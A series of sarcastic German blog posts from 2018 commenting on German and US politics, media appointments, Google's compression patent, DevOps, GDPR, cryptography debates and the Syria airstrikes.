[l] Oh gut, den Rant über die CSU kann ich mir sparen. Den hat schon eine "Zeit"-Kolumnistin gemacht. Und Recht hat sie. Vorruheständler aus dem Alpenland. Das trifft es ganz gut.
Und dieser Masterplan-Taschenspielertrick, dass die es wagen, mit so einer Kindergartenscheiße das Land zu verarschen zu wollen!
Money Quote:
Vor der Bundestagswahl gab es keine Politik wegen der Bundestagswahl. Nach der Bundestagswahl fand keine Politik statt, wegen Sondierungsgesprächen. Nach den Sondierungsgesprächen fand keine Politik statt wegen der FDP. Dann kamen die Koalitionsverhandlungen und es fand keine Politik statt, weil die SPD noch fix und fertig war. Und jetzt findet keine Politik statt, weil die CSU alles lahmlegt. Wie gesagt, in der Welt der normalarbeitenden Menschen wären solche Leute schon längst ein Fall für die Reha.
Amen.
[l] Oh Gott. Die neue Chefin von tagesschau.de hat vorher bei Buzzfeed Deutschland "Redaktionsleitung" gemacht. Clickbait sortieren? Srsly? Und das qualifiziert die für tagesschau.de?!?
Ja, äh, schade. Money Quote:
"Leopold bringt beste Voraussetzungen mit: große Nachrichtenkompetenz, umfassende Online-Kenntnisse, Freude an der Teamarbeit. Mit ihr wird ARD-aktuell das Profil von tagesschau.de weiter schärfen", sagte der NDR Intendant Lutz Marmor.
What the … I don't even …
Was heißt denn bitte "große Nachrichtenkompetenz"? Das hätte ich bei Leuten gesagt, die bei 20 Jahre bei der dpa gearbeitet haben. Aber Buzzfeed!?!?
Und "umfassende Online-Kenntnisse" klingt, als hätten sich die alten Männer bei der Tagesschau gedacht, sie bräuchten sie jemanden, der sich mit Youtube-"Influencing" auskennt. So Social-Media-Selbstpromoter und Publikums-Clickbaiter. Und "Freude an der Teamarbeit" kenne ich nur als Beleidigung, wenn man im Zeugnis was Positives schreiben muss, aber es inhaltlich nichts Gutes zu sagen gibt.
Ich hoffe mal, dass das nur der erste Eindruck ist, der hier so entsetzlich und katastrophal ist.
Update: Oh am Ende steht dann wohl die eigentliche Motivation für die Personalie:
Leopold ist Mitgründerin des Blogs kleinerdrei.org, der für den Grimme Online Award 2014 nominiert wurde.
Wer kleinerdrei nicht kennt: Das ist einer der Pfeiler des deutschen "Netz-Feminismus", bei dem es inhaltlich meinem Eindruck nach im Wesentlichen um Kategorisierung von Menschen im öffentlichen Diskurs nach SJW-Kriterien in gut und böse geht. Hauptsächlich böse.
Daher ist meine erste Assoziation, dass die sich möglicherweise ala "einer meiner besten Freunde ist ein Jude" gegen Twittermobjustiz immunisieren wollen. Aber warum? Haben die jemals Shitstorms aus der Richtung abgekriegt? Weiß das jemand?
Update: Zu Illustrationszwecken hier die aktuellen "Nachrichten" bei Buzzfeed Deutschland:
41 raffinierte Tattoo-Ideen, die sogar deinen Eltern gefallen werden
17 italienische Babynamen, in die du dich sofort verlieben wirst
14 Leute, die komplett und zu 100% recht haben
20 bedrückende Geschichten, die zeigen, warum Frauen Angst haben, Männer zurückzuweisen
17 Hunde, die sich wirklich furchtbar für ihr Betragen schämen sollten
25 wirklich peinliche Dinge, die du beim Feiern in den 2000ern gemacht hast
23 unfassbar ekelhafte Geständnisse, die dich richtig zum Würgen bringen
"Große Nachrichtenkompetenz", ja?
Und aktuelle kleinerdrei-Inhalte sind: Interview Missy-Herausgeberin, "Kann ein Gentest dir helfen, deiner Identität auf die Spur zu kommen", was über Depressionen, "Wie können nichtjüdische Menschen am besten ihre Solidarität mit jüdischen ausdrücken", "Warum ich bei der WM nicht für Deutschland jubele". Oh und was über geplatzte Kondome.
Update: Das mit den Online-Kenntnissen muss man wohl auch in Zweifel ziehen, wenn man sieht, dass solche Tweets hier noch nicht diskret weggelöscht wurden. Das ist ja wohl die Kernkompetenz unter den verlogenen Twitter-Empörten, dass sie ihre Accounts auf Protected schalten, die halbe Welt bannen und ihre peinlichen Tweets löschen.
Update: Oh und dann war da noch dieses peinliche Kapitel.

Sun Jun 24 2018

[l] Die EU scheint gerade an der Flüchtlingsfrage zu zerbrechen. Die haben einen Gipfel gemacht, aber konnten es nicht mal Gipfel nennen. Die Teilnehmer haben praktisch alle ihre Forderungen so geschraubt, dass es keinen Kompromiss geben kann.
Italien will die Dublin-Regelung abschaffen, nach der die Migranten im Einreiseland den Asylantrag stellen müssen.
Die CSU will, dass Migranten nicht nach Deutschland einreisen dürfen.
Die Visegrad-Länder wollen, dass innerhalb der EU die Flüchtlinge nicht gerecht verteilt werden.
Was zur Hölle soll es denn da für einen Fortschritt geben?

Wed Jun 20 2018

[l] Youtube hat die Videos der Blender Foundation gesperrt, weil die populär waren und nicht Werbung einblenden wollten. Youtube hat Blender einen Vorschlag gemacht, den sie nicht ablehnen konnten — und Blender hat ihn doch abgelehnt und ist zu Peertube gegangen.
Besonders peinlich: Youtube redet sich jetzt mit lahmen Ausreden wie "eine Mischung aus Zufällen, schlechten Benutzeroberflächen, falschen Fehlermeldungen, unwissenden Support-Mitarbeitern und unserer eigenwilligen Entscheidung, einen beliebten Youtube-Kanal nicht zu monetarisieren" raus (fasst der Blender-Foundation-Chef das zusammen).

Tue Jun 19 2018

[l] Die nächste Berufsgruppe, die von Computern überflüssig gemacht wird: Parlamentarier.

Sat Jun 16 2018

[l] Der US-Spamwirtschaft fällt gerade auf, dass niemand Opt-In gemacht hat bei ihren Datenschutz-Warnmails.
Ja wie kommt denn sowas? Wollen die Leute etwa die wichtigen Hinweise gar nicht haben?!

Sun Jun 10 2018

[l] Kennt ihr Jarek Duda? Der Mann ist ein Wissenschaftler aus Polen, dem einen Durchbruch bei Kompressionsverfahren gelungen ist, schon 2014.
Die Älteren unter euch werden sich noch an PKZIP erinnern, und den Erfinder von Deflate, Phil Katz. Phil war Amerikaner und hat den Scheiß patentiert, aber war schlecht beraten und hat nur genau das Verfahren patentiert, nicht Variationen davon. Daher gab es zlib und gzip, die sind eine Variation davon. Phil Katz starb vor ein paar Jahren, angeblich verschuldet.
Ein anderes bahnbrechendes Verfahren in der Datenkompression ist arithmetische Kompression. Das war patentiert, also hat es in der Praxis kaum jemand verwendet, bis das Patent auslief.
Jarek Duda hat sich entschieden, seinen Durchbruch explizit nicht zu patentieren sondern das der Public Domain zu übergeben, d.h. alle dürfen es verwenden, es ist gemeinfrei und gehört der Öffentlichkeit. Daher sage ich: Der Mann ist ein Held. Ein ungesungener Held, leider.
Und, wie sich rausstellt, nur weil er das 2014 gemeinfrei gemacht hat, heißt das nicht, dass nicht eine stinkenden Kapitalistenklitsche wie Google losrennt und anderer Leute Public Domain zu patentieren versucht. Sorry, Google, aber von allen Arschloch-Moves auf der Welt ist das einer der ganz, GANZ großen. Das ist noch drei Größenordnungen arschlochiger als die Daten der Welt sammeln und für Werbe-Targeting verwenden. Euer Ruf ist jetzt so verschlissen, das kriegt ihr nie wieder repariert.
Darauf angesprochen meint Google übrigens:
"Google has a long-term and continuing commitment to royalty-free, open source codecs (e.g., VP8, VP9, and AV1) all of which are licensed on permissive royalty-free terms, and this patent would be similarly licensed."
Jaja, commitment, kennen wir schon. Bestimmt wollten sie uns nur schützen! Damit keiner der Bösen das patentiert!1!!
Ja nee, Google, so läuft das nicht.
Duda isn't convinced, though. "We can hope for their goodwill; however, there are no guarantees," he said in an email to Ars. "Patents licensed in 'permissive royalty-free terms' usually have a catch."
Ja, äh, wenn das permissive und royalty-free ist, wieso patentiert ihr es denn dann überhaupt?
Das US-Patentrecht hat für sowas recht klare Regeln. Wenn das vorher irgendwo dokumentiert war, ist das Prior Art und invalidiert das Patent. Insofern ist das jetzt eine klare Sache, nur dass halt jemand Kohle in die Hand nehmen muss in den USA, um dieses Patent aktiv zu bekämpfen. Google hofft anscheinend, dass das niemand tun wird.
Update: Xiphmont glaubt, das könne ein Fall von "gleichzeitig von mehreren Leuten erfunden" sein.

Thu Jun 7 2018

[l] Devops ist ja aus meiner Sicht eine Chimäre. Teils Religion, die gemacht wird, weil man zu den hippen, modernen Leuten gehören will. Teils Ergebnis von Golfplatz-Marketing ("Wie, ihr habt noch kein Devops? Wir machen das schon seit nem halben Jahr!"). Und häufig wird nur die eine Hälfte gemacht, z.B. das Feuern der Admins. Und dann wundern sich alle, dass es nicht funktioniert.
Und DASS das im Allgemeinen nicht funktioniert, ist sogar bei Gartner angekommen. :-)
"Wer derzeit mit DevOps experimentiert oder sie bereits im Einsatz hat, ist weitestgehend unzufrieden; und auch die weiteren Aussichten sind eher trübe“, sagte Gartner-Analyst Ian Head.
Gut, nicht dass irgendjemand was darauf geben sollte, was Gartner sagt. Aber lustig finde ich es ja schon :-)

Mon Jun 4 2018

[l] Benjamin Netanjahu tourt ja gerade rum und macht Werbung für einen Irankrieg. Dabei kam er auch bei uns in Deutschland vorbei und macht eine gemeinsame Presse-Fragestunde.
Und das Pressecorps hat den monumentalen Fehler begangen, Tilo Jung reinzulassen, der sich nicht lange bitten lässt und u.a. Bibi fragt, wie das denn mit der West Bank ist gerade (Israel annektiert das Land gerade), ob Israel die besetzten Gebiete jemals freigeben wird, vielleicht gar in Netanjahus Amtszeit, und dann noch ein paar Stichelfragen an Mutti Merkel, wieso wir eigentlich mit einem Land Waffenhandel betreiben, das Menschenrechte verletzt und illegal Atomwaffen beschafft hat.
Netanjahu antwortet, die Frage mit der Annextion der West Bank werde gerade von den Gerichten geklärt, die ja unabhängig seien, und Israel hielte sich natürlich immer an die Entscheidungen der Gerichte. Zur Westbank meint er, die Juden seien mit dem Land seit 4000 Jahren verbunden und er will da ja niemanden rausschmeißen sondern in Frieden mit den Palästinensern leben. Und Schuld daran, dass es nicht zu einer Zweistaaten-Lösung kommt seien ja auch die Palästinenser, die sich immer weigern würden, dem zuzustimmen. Und Hamas sagt ja immer, sie wollen den jüdischen Staat zerstören. "Wir haben ihnen Gaza gegeben und sie haben daraus ein bewaffnetes Kampflager gemacht, feuern tausende von Raketen auf uns, verbrennen unsere Felder, und sie versuchen eine Invasion von Israel, haben Kibbuzim ermordet und unsere Soldaten entführt." Oh und der Gazastreifen, die liefen ja immer vom Verhandlungstisch weg, wenn Israel ihnen ein Angebot macht.
Was aus seiner Sicht einen Frieden verhindert, ist dass die fiesen Palästinenser sich nicht durchringen können, den Juden einen Staat zu gönnen. Man könne ja darüber reden, wie groß der sei und wo genau, aber er müsse da "in our ancestral homeland" sein.

Thu May 31 2018

[l] Und noch eine wichtige Klage ist heute verlorengegangen: ICANN ist mit seinem Versuch gescheitert, die Erhebung und Speicherung von Whois-Daten in Deutschland zu erzwingen.
Das ist doch mal eine schöne Kombination. Internet-Daten, die der Öffentlichkeit nützen, werden weggemacht. Internet-Daten der Öffentlichkeit, die dem Staat nützen, werden abgeschnorchelt. Tolles Land, in dem wir da leben.
Quod licet Jovi, non licent bovi.
Die Details könnt ihr im Urteil nachlesen. Die Daten des Domaininhabers werden immer noch erhoben, aber der Tech-C und Admin-C nicht mehr.

Mon May 28 2018

[l] Es gibt gerade bei der IETF einen konzertierten Anlauf, einen neuen Krypto-Messenger zu definieren. Nur Signal ist nicht dabei.
Warum Signal nicht dabei ist, kann ich euch nicht sagen, aber ich kann euch sagen, warum ich das an deren Stelle möglicherweise boykottiert hätte: Mitautor ist Eric Rescorla, aktuell bei Mozilla. Ja und? Mozilla sind doch die Guten? Und Der Rescorla hat doch auch schon bei der TLS-Arbeitsgruppe mitgemacht?
Ja, aber. Ich war nicht dabei, insofern ist das jetzt alles Hörensagen. Gegen Rescorla gibt es mehr oder weniger konkrete Vorwürfe, er habe TLS so stark ausgebremst, dass man sich das nur noch über Fernsteuerung durch die NSA erklären kann. Siehe z.B. hier. Solange er sich zu der NSA-Backdoor nicht erklärt, würde ich den nicht im zehn-Meilen-Radius um mein neues Krypto-Projekt dulden. Bei TLS 1.3 war der auch beteiligt. Da bin ich auch gerade eher zurückhaltend deswegen.

Sat May 26 2018

[l] Endlich auch mal eine gute Nachricht: Amazon rettet The Expanse, die TV-Serie. Jeff Bezos himself hat die Ansage gemacht.

Wed May 23 2018

[l] Bist du ein Blogger?
Machst du dir Sorgen, dass du wegen DSVGO abgemahnt werden könntest?
Nun, der Klabautercast 154 kann euch da vielleicht die Sorgen nehmen. Maha redet mit Bea (vertritt u.a. die Freifunker anwaltlich gegen die Abmahnindustrie), und ab ca. 55 Minuten geht es um Blogger und was für Belastungen die DSGVO wirklich auslöst. Und ab ca 1h30 erklärt Bea, wie sie nicht glaubt, dass sich eine Abmahnindustrie für Datenschutzverstöße geben wird.
[l] James "Spontaner Spot-Alzheimer" Clapper fühlt sich total ungerecht behandelt. Trump hat ihn als "Lying Machine" bezeichnet, das fand er nicht in Ordnung. Nur weil er bei der NSA-Anhörung die Spionageprogrammer verwechselt hat und falsche Angaben gemacht hat, ist er doch noch kein Lügner! Das war halt ein Fehlerchen, kann doch jedem mal passieren! (Vorgeschichte)
Update: Wenn ihr euch übrigens gerade fragt, was James Clapper bei "The View" macht, einer belanglosen Talkshow, wo die Promis zum Bewerben ihrer neuen Filme und Bücher hinfahren: Er hat ein neues Buch draußen. "Facts and Fears: Hard Truths from a Life in Intelligence". Nein, wirklich! James "Alternative Fakten" Clapper schreibt ein Buch über Fakten und Wahrheit! Echt schade, dass wir die Fnord-Show beendet haben.

Tue May 22 2018

[l] OK, das reicht jetzt mit den School Shootings. Da muss endlich mal was gemacht werden. Oh ich habs, CCTV mit Gesichtserkennung in der Schule! Das System kommt von einer Firma aus dem Gefängnis-Industrie-Komplex der USA. Wieso würden sie sowas kaufen? Na ganz einfach:
The Lockport district says that the system will make students safer by alerting officials if someone on a sex-offender registry or terrorist watchlist enters the property.
Klingt gut, bis man merkt, dass:
None of America's school shootings or high-profile serial sex abuse scandals were carried out by wanted terrorists or people on the sex-offender registry.
Hups. Nun, äh, was soll ich sagen. Ist ja nicht mein Geld. Sind Steuergelder.
[l] Wenn sich dein Selbstwertgefühl dadurch bestimmt, wie sehr und auf wie viele Arten du Opfer bist, und niemand will dich diskriminieren, dann muss man sich halt selbst cyber-bullyen (sp?). Das scheint jetzt ein Trend zu werden.
Ich glaube ja langsam, dass das nicht böses Patriarchat und Unterdrückung war, wenn die Gesellschaft früher Leute dafür gefeiert hat, wenn sie Hindernisse und Widrigkeiten überwunden haben und was aus sich gemacht haben. Vielleicht haben die das mit dem Opfer-Gehabe vorher probiert und es war eine Katatstrophe und dann haben sie halt lieber das nächst-beste getan und das Erreichen von Zielen gefeiert. Weil das gesellschaftlich bessere Ergebnisse liefert. Oder so.
Oder kommt das Opfertum-Olympia heutzutage vielleicht daher, dass die Kids heute ohne Perspektive auf einen sicheren Job aufwachsen? Was meint ihr?
Aus dem Artikel:
“I started because I saw other people on Tumblr getting these anon hate messages,” explains Julian, who is now a 22-year-old university student in London. “They were quite popular so their followers would really support them through it and send them nice messages. I didn’t have many followers at the time so I thought sending myself a hate message might be a good way to get attention.”
Fuck yeah! Die Erkenntnis, dass die meisten Leute um einen herum auf die eine oder andere Art kaputt sind oder irgendwelche furchtbaren Probleme haben, hat früher dazu geführt, dass man sich vornahm, selbst sein Leben besser zu führen. Heute führt es dazu, dass man einer von denen sein will.
[l] Die Leute, die für Trump die Tweets tippen, haben daraus ein Trinkspiel gemacht. Sie bauen absichtlich kaputte Grammatik und Interpunktion und Alzheimer-Stil ein, weil sie glauben, dass die Basis dann ein Verbundenheitsgefühl entwickelt.
[l] Leserbrief:
Yahoo wurde ja von der Oath Group übernommen. Wenn man sich jetzt einloggt, soll man als erstes die neuen Datensammel-Einstellungen abnicken.
Anstelle aber einfach mit "OK" alles abzunicken (und damit alles zu erlauben), kann man auch individuelle Einstellungen vornehmen:
Alle Ad-Partner sind per Default aktiviert (Datensammeln erlaubt). Man muß die Ad-Partner, von denen man NICHT getrackt und überwacht werden will, einzeln weg-klicken. Es sind 318 Ad-Partner. Die haben für jeden Partner einen einzelnen Button gemacht, in der Hoffnung, daß kein User sich die Arbeit machen wird, die alle einzeln zu deaktivieren. Es sind tatsächlich 318 winzige Buttons, bei denen man auf "Deaktivieren" klicken muß. Nein, wirklich!
Das dauert eine gefühlte halbe Stunde….. Krasser geht Opt-out nicht mehr!
Screenshot attached
HARR HARR HARR
Update: Einige Leser haben das ausprobiert und sagen, da gibt es (inzwischen?) einen Knopf oben, wo man alle auf einmal ausschalten kann.

Sun May 20 2018

[l] Zu dem gefeuerten Karikaturisten der Süddeutschen gibt es ein paar Updates.
1. Wolfgang Benz, langjähriger Leiter des Zentrums für Antisemitismusforschung, kann in der Karikatur keinen Antisemitismus erkennen.
2. Der Karikaturist hatte auch fiese Anti-Erdogan-Karikaturen gemacht, und damals war er noch mit "free speech" verteidigt worden. Das stößt jetzt den Türken ein bisschen auf, die anscheinend gerade eh nicht so gut auf Netanjahu und Israel zu sprechen sind.

Sat May 19 2018

[l] Ich habe ja eigentlich langsam die Schnauze voll von Superheldenfilmen, aber Black Panther wurde ja so gefeiert, dass ich mir das doch mal angeschaut habe. Und ich bin ehrlich gesagt ziemlich verwirrt jetzt. Ich verstehe nicht, wieso die SJW den so gefeiert haben.
Der Film handelt von einem Land in Afrika, das aus einem Meteor ein Wundermaterial extrahiert und sich damit einen immensen unfairen Vorteil verschafft hat, und jetzt sind sie technologisch weiter als der Rest der Welt zusammen. Das bringt ja schon mal kein Sympathiepunkte ein für die.
Die leben da in einer Tech-Utopie, während der Rest des Kontinents hungert. Und was für eine Staatsform haben sie? Eine Monarchie! Nein, wirklich!
Werden sie wenigstens von einer weisen Königin regiert? Nein! Von einem Mann nach dem andern! Oh und wie entscheiden sie die Thronfolge? Mit einem rituellen Duell bis zum Tod!
Ja, äh, also, öhm, wo bleibt denn der positive Teil über die Schwarzen? Oh, ich weiß, die starken weiblichen Rollen, von denen man so viel gehört hat! Welche Rollen waren das noch gleich? Vor allem die Leibgarde des Königs. Ich musste da irgendwie nicht an starke weibliche Figuren denken sondern an Gaddafis Leibgarde. Und die Kostüme ein Mischmasch daraus, wie sich der weiße Mann die Barbaren in Afrika vorstellt. Große bunte Bemalungen, große bunte Eingeborenen-Kleidung, die Leibgarde hatte so einen Halsschutz, der eher an Myanmar als an Afrika erinnert. Ist die Kostümabteilung wohl ein bisschen auf dem Globus verrutscht.
Die Frauen stehen vielleicht nicht am Herd, aber sie dürfen sich für den König opfern, weil Männer immer noch wichtiger sind als Frauen in dieser Welt.
Oh, wenn die so geile Technologie haben, was bauen die denn damit so? Na klar, vor allem Militärtechnik! Laser und raumschiffähnliche Fluggeräte, klingonische Schmerzstäbe und Naniten für den Kampfeinsatz.
Ich bin vielleicht nicht gut geschult und habe daher das Virtue Signalling übersehen, das hier so gefeiert wurde, aber die eine Figur im Film, die sich nicht von Emotionen übermannen lässt und niemanden umbringt ist der Token-Weiße, der einen CIA-Mann spielt, der routinemäßig fremde Länder kaputtmacht und Regierungen destabilisiert. Und ausgerechnet der hilft dann diesem Wunderland, anstatt es zu zersetzen und seine Technik zu klauen.
Die Schwarzen sind alle von ihren Emotionen auf die dunkle Seite geführt worden und haben schlimme Dinge gemacht, kleiden sich wie in der Safari-Werbebroschüre, und machen Gorilla-Geräusche (nein, wirklich!). Ich hab mich da fremdgeschämt.
Update: Hier ist ein Thread über das Kostümdesign. Der Teil meiner Kritik stimmt also nicht. Solche Halsringe gibt es auch in Afrika, stellt sich raus. Und vielleicht habe ich verwechselt, wer Black Panther geil fand, und das waren die Alt Right?
Ein Leser merkt an, dass ihm das mit Wonder Woman ähnlich ging. Mir auch.

Fri May 18 2018

[l] Boah bei Heise blubbern immer noch "PGP IST TOT!!1!"-Meldungen über den Ticker. Hey Heise, hattet ihr nicht bis 2017 gar keine Verschlüsselung? Wann habt ihr nochmal https angeschaltet? Und IHR habt jetzt die Stirn, anderer Leute Krypto zu kritisieren?!
Facebook verliert Milliarden an Datensätzen, TLS benutzt bis heute niemand mit Client Certs, CAs failen links und rechts, … ach weißte, das kriegen die schon wieder hin. Machen die ein Update, ist wieder gut.
PGP macht nicht mal einen Fehler sondern wird nur schlecht integriert, und alle so: PGP IST TOT!!1!
Ich krieg echt Bluthochdruck. Seit Jahren schreiben Heise und Co PGP tot, weil das ja angeblich zu schwierig zu benutzen sei. Stattdessen empfehlen sie Signal, wo man selbst als Experte nicht viel Chancen hat, einen Man-in-the-Middle-Angriff zu erkennen. Irgendwo steht kleingedruckt, dass sich ein Key automatisch geändert hat. Nachdem sich Experten beschwert hatten. JA SUPER. Oh und Signal hat zentralisierte Infrastruktur. JA SUPER!!1! Genau die Plattform für internationales Dissidententum!
Heise, ich schlage vor, dass ihr mal ein paar Jahre den Ball flach haltet in Sachen Krypto. Das geht echt gar nicht.
Hier mal meine Ansage zum Thema Krypto-Usability: Traut keiner Software, die Krypto so wegabstrahiert, dass die Komplexität nicht mehr den User erreicht, oder die euch den Quellcode nicht zeigen wollen. Da werden immer irgendwelche faulen Kompromisse gemacht.
PGP ist nicht schwierig zu benutzen. Wenn Heise nicht seit Jahren den Leuten einreden würde, dass PGP zu schwierig ist, hätten wir vielleicht die doppelte Abdeckung. Auto oder Wohnungstür aufschließen ist auch ein extra Schritt, und wenn man den Schlüssel verliert, hat man Mehraufwand. Das hält auch niemanden davon ab, Schlösser zu verbauen.
Update: Ich finde das besonders tragisch, weil Heise jahrelang auf Veranstaltungen PGP-Keysigning-Parties gemacht hat. Die waren mal die Guten.

Thu May 17 2018

[l] Kurzes Drehtür-Update:
Als Bundeswirtschaftsminister hatte sich Gabriel für den Zusammenschluss von Siemens und Alstom stark gemacht: Nun soll er in den Verwaltungsrat des geplanten Konzerns berufen werden.

Fri May 4 2018

[l] Old and busted: EU Privacy Shield.
New hotness: EU GDPR Shield!
Ich ärgere mich ja, dass ich das nicht als meinen Aprilscherz gemacht habe dieses Jahr. Scheiße ist das eine großartige Idee!
[l] Ich weiß nicht, ob ihr das mitgekriegt habt, aber gerade die mal wieder die re:publica in Berlin, und die Bundeswehr hat da ein massives Propagandaaufgebot hingekarrt, hauptsächlich zum Rekrutieren natürlich, aber es ging anscheinend auch darum, mal ihre Cyber-Fähigkeiten im Feld zu testen, als sich im Internet Protest formierte. :-)
Es ging (alles Hörensagen ab hier) damit los, dass die einen Stand haben wollten, und das hat die Orga abgelehnt. Die haben der Bundeswehr gesagt, sie können höchstens auf der Bühne debattieren, dann aber nicht die PR-Truppe sondern jemand mit politischer Verantwortung, und wenn sie Leute ins Publikum schicken, dann nicht in Flecktarn sondern höchstens Ausgehuniform. Daraus hat die Bundeswehr dann eine "Ausladung" gemacht in ihrer PR. Die Psyop-Abteilung wollte also auch mal spielen. :-)

Thu May 3 2018

[l] LLVM scheint sich ein SJW-Autoimmunproblem zugezogen zu haben. Der Typ, der da lautstark beleidigt hinwirft, ist laut Phoronix der fünf-aktivste Mitarbeiter bei LLVM. Oder war, denn jetzt wirft er ja hin.
Er begründet das mit der Teilnahme von LLVM bei einem Outreach-Programm namens Outreachly. Ich kenne da jetzt die Details nicht, aber der Gründer des LLVM-Projekts heißt Chris Lattner, und die Frau, die diese Mitgliedschaft anscheinend bei LLVM begleitet, heißt Tanya Lattner. Der dort verlinkte CFP sagt allerdings, daraus sei nichts geworden. Ist mir also gerade nicht klar, was hier der konkrete Problempunkt war…?
Der Typ schreibt jedenfalls:
Somewhat recently a code of conduct was adopted. It says that the community tries to welcome people of all "political belief". Except those whose political belief mean that they don't agree with the code of conduct. Since agreement is required to take part in the conferences, I am no longer able to attend.
Das halte ich für ein Problem, das man ernst nehmen sollte. Das Gefühl, ausgegrenzt und benachteiligt zu werden, ist nicht schön, und hat ja überhaupt erst zur Gründung der SJW-Bewegung geführt. Wenn ihr wollt, dass wir das bei der einen Seite ernst nehmen, dann müsst ihr es auch bei der anderen Seite ernst nehmen.
Falls jetzt übrigens jemand denkt, diese Tanya, die macht bestimmt nur SJW-Scheiß und hat von Technik keine Ahnung (nicht, dass das inhaltlich eine Rolle spielen würde): Sie arbeitet als Compiler-Ingenieur bei Apple. Und den CFP für dieses Outreach-Programm fand ich jetzt auch nicht irgendwie schlimm oder ausgrenzend. Das ist halt ein Stipendium. Wer das Geld will, muss den Regeln genügen. Deswegen hätte ich jetzt kein Fass aufgemacht. Aber wenn man an der Konferenz nicht teilnehmen darf, wenn man nicht einen Wisch mit einem Glaubensbekenntnis unterschreibt, das finde ich auch ausgesprochen bedenklich. Ich frage mich, ob er das überinterpretiert hat, oder ob das wirklich so ablief.
[l] Trump hat mit seinem "legal team" nicht viel Glück. Ein Haufen von Versagern und Verlierern sondergleichen. Daher hat er neulich seinen alten Kumpel Rudi Giuliani reingeholt, damit er mal alle rausschmeißt.
Giuliani hat mehrere Leute gefeuert und dann bei Hannity auf Fox News ein Interview gegeben. Die Fragen waren natürlich nicht sehr investigativ, könnt ihr euch ja vorstellen.
Aber Giuliani hat Donald Trump trotzdem unter den Bus geworfen in dem Interview. Er hat in drei Fällen Trumps Verteidigungsstrategie widersprochen. Erstens hat er bestätigt, dass Trump Comey gefeuert hat, weil der nicht öffentlich ansagen wollte, dass Trump nicht Ziel laufender Ermittlungen sei. Zweitens hat er angesagt, dass er persönlich die Mueller-Fragen geleakt hatte, um in der Presse den Eindruck zu erwecken, das liefe nicht fair (dabei hatten Trumps Anwälte diese Fragen formuliert!). Außerdem sagt Giuliani an, dass Trump dem Cohen die $130k zurückgezahlt hat, die der an Stormy Daniels als Schweigegeld gegeben hatte. Oh und außerdem hat ja der Cohen "little or no legal work" für Trump gemacht, sagt Giuliani (was die Verteidigungsstrategie entkernt, dass die beschlagnahmten Dokumente geschützte Anwalt-Klienten-Kommunikation war).
Mit Freunden wie Rudi "9/11" Giuliani braucht man keine Feinde mehr :-)
Update: Auch Trump selbst gibt inzwischen zu, dem Cohen die Schweigegeld-Auslagen erstattet zu haben.

Tue May 1 2018

[l] Der russische schwimmende Atomreaktor sticht in See. Der Hersteller hat sich vergleichsweise viel Sorgen gemacht:
Nach Angaben des Herstellers wurden dabei auch Erdbeben der Stärke 10 simuliert, bei denen das Schiff durch einen entstehenden Tsunami an Land gespült werden würde.
Das Schiff soll jetzt in Sibirien vor Anker gehen und dort eine Kleinstadt mit Strom versorgen. Die Fotos, die man im Internet findet, sehen nicht sonderlich einladend aus.

Thu Apr 26 2018

[l] Wikipedia sperrt den sächsischen Landtag für einen Monat. Anonyme Änderungen sind aus dem Adressbereich jetzt nicht mehr möglich.
Zuvor hatte von dort jemand aus dem Wikipedia-Eintrag zu Sachsen den Rassismus-Absatz gelöscht, aus der fremdenfeindlichen Pegida eine islamkritische Pegida gemacht, und beim Eintrag eines AfD-Abgeordneten das Teil entfernt, dass er Homosexualität-Verfolgung nicht als Asylgrund anerkennen will. (Danke, Carsten)

Wed Apr 25 2018

[l] Wie sieht es eigentlich auf so einem Kometen aus?
Rosetta hat da mal ein Video gemacht!

Sun Apr 22 2018

[l] Auch die US-Regierung hat Humor, wie sich rausstellt.
Der notorischen Site muckrack.com, die seit vielen Jahren mit stetigen penetranten FOIA-Anfragen rumnervt und die befreiten Dokumente dann ins Netz stellt, haben sie jetzt (zum 1. April?) eine Packung Wavie-Paranoiker-Futter zugemailt. So ala "hups, was ist uns denn DA aus der Tasche gefallen!1!!" :-)

Fri Apr 20 2018

[l] Die USA, Frankreich und die Briten haben gemeinsam Syrien bombardiert, das habt ihr ja sicher mitgekriegt. Ich wollte da nichts zu sagen, weil aus meiner Sicht alles gesagt ist. Und weil man im Moment eh von allen Seiten mit Propaganda bombardiert wird.
Aber jetzt sag ich doch was dazu :-)
Es ging damit los, dass sich Colbert darüber lustig machte, dass die nichts getroffen haben. Trump hatte das auf Twitter angesagt, also hat Assad den Kram und die Leute rechtzeitig weggeschafft.
Aber gut, das ist noch nicht lustig genug.
Als nächstes kommt im Krieg immer der Bullshit-Tsunami von beiden Seiten, die der Presse erklären, dass sie gerade haushoch gewonnen haben. Gut, nicht immer, manchmal ist die Lage so schlimm, dass man nichts mehr schönreden kann. Aber die Amis und die Russen haben natürlich rumpropagandisiert. Fangen wir mit den Amis an. Die Amis haben großspurig verkündet, ihre Cruise Missiles seien alle eingeschlagen, bevor die Luftverteidigung der Syrer überhaupt Gegenwehr versucht habe, und dann hätten die Syrer auch bloß zwei Raketen losgeschickt, und die hätten nichts getroffen. Und sie sagen, die Russen hätten gesagt, sie hätten 71 der Cruise Missiles abgefangen.
Naja, wem glaubt man jetzt. Interessant ist an dem Protzen der Amis vor allem, dass die russische Luftabwehr in Syrien ja auch keine signifikante Chance gehabt hätte, irgendwas abzufangen, denn die Cruise Missiles seien so ultra-fortschrittlich gewesen:
It is hardly surprising that Syria's late-Cold War-era air defense systems didn't fare too well against advanced low-observable and maneuverable standoff weapons like the U.S. Joint Air-to-Surface Standoff Missile-Extended Range (JASSM-ER).
U.S. JASSM-ER and Tomahawk land-attack cruise missiles, French SCALP, and British Storm Shadow cruise missiles are designed to pose a challenge to adversary interceptors. Air-breathing long-range cruise missiles, because of their ability to fly low and generate a low heat signature in flight, are far from simple for enemy radars to acquire early enough in flight to successfully cue interceptors.
Die sind SO GUT, dass nicht mal die eigenen Luftabwehrsysteme der Amis sie zuverlässig abwehren können!
OK, Propaganda halt. Aber jetzt kommt der lustige Teil, wegen dem ich das alles blogge. Der wissenschaftliche Dienst des Bundestags hat ein Gutachten gemacht, dass die Völkerrechtswidrigkeit des Luftschlags bestätigt, und am Rande in dem Artikel steht dieser Kracher hier:
Nach dem Luftangriff sind dem russischen Militär eigenen Angaben zufolge zwei nicht explodierte Marschflugkörper in die Hände gefallen. Die Waffen seien zur Untersuchung nach Russland gebracht worden. Das sagte eine Quelle im Verteidigungsministerium der Agentur Interfax. Besonders interessant seien die Steuerung und die radarabweisende Oberfläche der gut erhaltenen Marschflugkörper.
NEIN!!! HAHAHAHAHAHA, OMG, das wäre ja der Kracher, wenn das stimmt! Ooooh was für ein Eigentor!

Thu Apr 19 2018

